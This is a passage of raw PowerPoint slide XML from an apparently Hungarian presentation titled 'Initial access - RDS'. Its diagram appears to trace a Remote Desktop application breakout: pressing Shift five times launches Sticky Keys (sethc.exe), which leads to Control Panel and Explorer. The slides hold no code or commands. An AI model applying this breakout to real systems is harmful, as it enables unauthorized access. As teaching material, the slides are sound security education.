        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Kép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92260" y="0"/>
            <a:ext cx="189574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1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1B54A-21CF-0120-CCE3-83013DA9D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Rectangle: Rounded Corners 367">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D91CAF0-3CC9-0332-9D58-D574E61BCB90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3837672" y="1932981"/>
            <a:ext cx="8934954" cy="702988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!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4746610-C983-3ADE-9903-2628CCE28E8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059076" y="851318"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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23"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>Kezdeti hozzáférés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>RDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold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7E61075-764C-583A-E556-8C9F6AE0B99B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102149" y="1992267"/>
            <a:ext cx="3793839" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>RDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>futtatja az alkalmazást</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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F9DB4D7-AECF-F1B7-750C-1DB552918108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598564" y="1956357"/>
            <a:ext cx="3102158" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sticky Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>elindítva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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3AC0B0E-BD23-7A18-9683-BAFBE571037F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13137357" y="1950271"/>
            <a:ext cx="3473660" cy="4770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hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vezérlőpult -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Group 339">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B61A6C1-CC5B-F26B-A044-7F51FB67E463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3933517" y="3463803"/>
            <a:ext cx="4319580" cy="4633355"/>
            <a:chOff x="4562777" y="4712505"/>
            <a:chExt cx="4319580" cy="4633355"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Rectangle: Rounded Corners 338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5E9AED-BB72-A006-9DD7-E3F4B63EB507}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4562778" y="5983083"/>
              <a:ext cx="4258032" cy="3362777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77D9D9D0-9F50-9CAE-F695-3D21B4F5658D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4656510" y="4712505"/>
              <a:ext cx="3960514" cy="2698842"/>
              <a:chOff x="5279745" y="3170469"/>
              <a:chExt cx="4500644" cy="2857667"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="254" name="Elbow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EB24F0-E881-D393-CFA7-88AC49C9BC3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="269" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="5504212" y="5183751"/>
                <a:ext cx="617552" cy="247854"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56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263" name="Elbow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B90B6F-3E6F-69EB-E1CA-47F4ECE68388}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="276" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="4590875" y="3859339"/>
                <a:ext cx="1692011" cy="314272"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:tailEnd type="arrow"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="268" name="Group 267">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE89112-BE31-FC9B-388F-88C00426EA7D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5936915" y="5193746"/>
                <a:ext cx="3843474" cy="834390"/>
                <a:chOff x="12600383" y="914400"/>
                <a:chExt cx="3843474" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="269" name="Rounded Rectangle 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E535D3-F275-3C25-C933-14F79ECDB3E7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600383" y="1103018"/>
                  <a:ext cx="3781943" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="424D56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9489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SK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70" name="Graphic 269">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4E36E0-2CF3-8F11-AE27-35D05D9E74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  <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="271" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2828A061-07FA-E290-638F-2CF3AEE3ECC6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341700" y="914400"/>
                  <a:ext cx="3102157" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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1811382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1600" kern="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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easeofaccessdialog</a:t>
                  </a:r>
                  <a:r>
                    <a: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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>.exe</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp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id="{6C600CD7-8BBD-40C4-F943-CE5F0F317E2F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5594016" y="4439773"/>
                <a:ext cx="3145521" cy="834390"/>
                <a:chOff x="12600384" y="914400"/>
                <a:chExt cx="3145521" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="276" name="Rounded Rectangle 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A270611-8ED5-0419-45DC-68FA6845F8CC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600384" y="1103018"/>
                  <a:ext cx="2404204" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="424D56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9489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SK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77" name="Graphic 276">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA87F18-F679-DF51-B727-B36940C831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  <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="278" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10493486-F0A2-F16F-D902-D8BC4DEF8850}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341701" y="914400"/>
                  <a:ext cx="2404204" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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1811382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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>sethc.exe</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="337" name="Picture 336">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E927E5FE-C075-9A50-B44A-4F55CD56AF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62777" y="7220193"/>
              <a:ext cx="4319580" cy="1900615"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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EB2626E3-4025-D8CE-FBC5-1730697EB017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2886651" y="3039897"/>
            <a:ext cx="1674405" cy="442159"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="1902758" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="371" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F27E11E-E9BC-BE3F-2DEF-009DF18C5730}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="1902757" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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2" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7469E79-0FA8-635A-86DC-18F95738903D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324833" y="1138270"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>winlogon.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Rectangle: Rounded Corners 368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F22F8C-0153-7FEE-C44C-37F7B16192C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544080" y="5705913"/>
            <a:ext cx="2909979" cy="104741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[SHIFT] x 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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E54B9D37-5BD4-7234-0443-48F5CE303EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="417810" y="4375133"/>
            <a:ext cx="3031779" cy="3096136"/>
            <a:chOff x="417810" y="4375133"/>
            <a:chExt cx="3031779" cy="3096136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Elbow Connector 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6965C52-3595-47FC-53CD-4F99C4A9ADAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="260808" y="4895772"/>
              <a:ext cx="583229" cy="218109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6C8367EF-6F06-D9D8-D351-A9C88A886BC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1093728" y="6683254"/>
              <a:ext cx="2355861" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="2677150" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0FF265A-06C5-8D25-29F0-B67FF213F453}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2666325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54" name="Graphic 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{603EC8AB-24BD-5968-9777-A3560E825F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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90C6B6B6-21C5-80A3-B623-87F3EE7E4D05}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1935834" cy="834390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rdpshell.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="56" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3FB59DF-DEF6-999A-7055-629D8FB3653F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="53" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="153380" y="6142121"/>
              <a:ext cx="1564948" cy="315748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D9FA42F3-450B-A06E-DA30-6D61AC78BF5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1044004" y="5677075"/>
              <a:ext cx="2291285" cy="788015"/>
              <a:chOff x="12600383" y="914400"/>
              <a:chExt cx="2603767" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="88" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06C8334-AF16-2BBC-F56D-547DB680954E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600383" y="1103018"/>
                <a:ext cx="2571294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89" name="Graphic 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0DB7CDC-7F7F-A2C1-55F7-D49A2D5C55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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BD2115-C28B-D2B1-0E05-4AE43A13403D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1862450" cy="834390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outlook.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="91" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE7B34B-BA6B-6A8A-C28F-271AF419F7F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="88" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="485496" y="5517782"/>
              <a:ext cx="851690" cy="265326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13832D6-D69F-B956-8295-DCDB79DC835F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="661477" y="4897227"/>
              <a:ext cx="2768022" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="3145521" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{589B2394-D2A9-0115-0948-47C71AC36EB1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2404204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6" name="Graphic 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B6D93B-3A1F-E43B-6C50-7C94B8614C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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E2057F-B79E-93FE-B32F-DFA5C2358A54}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341701" y="914400"/>
                <a:ext cx="2404204" cy="834390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rdpinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="373" name="Group 372">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1E79C4-C142-E3F9-09A8-C7DD67E8DE4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="417810" y="4375133"/>
              <a:ext cx="1768546" cy="442159"/>
              <a:chOff x="12235545" y="1103018"/>
              <a:chExt cx="2009738" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="374" name="Rounded Rectangle 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1569E65C-2C2E-3192-881A-A189F0DFB19F}"/>
                  </a:ext>
                </a:extLst>
